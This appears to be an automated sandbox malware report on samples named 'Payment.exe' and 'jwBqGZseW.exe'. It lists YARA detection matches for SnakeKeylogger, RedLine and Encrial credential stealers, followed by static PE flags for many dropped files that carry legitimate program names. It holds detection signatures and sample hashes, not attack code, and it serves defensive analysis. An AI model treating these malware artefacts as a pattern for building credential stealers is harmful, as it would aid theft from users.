Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Payment.exe.3f7a328.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Payment.exe.411b348.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Payment.exe.3f7a328.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 18.2.jwBqGZseW.exe.44e24c8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: pingsender.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SgrmBroker.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
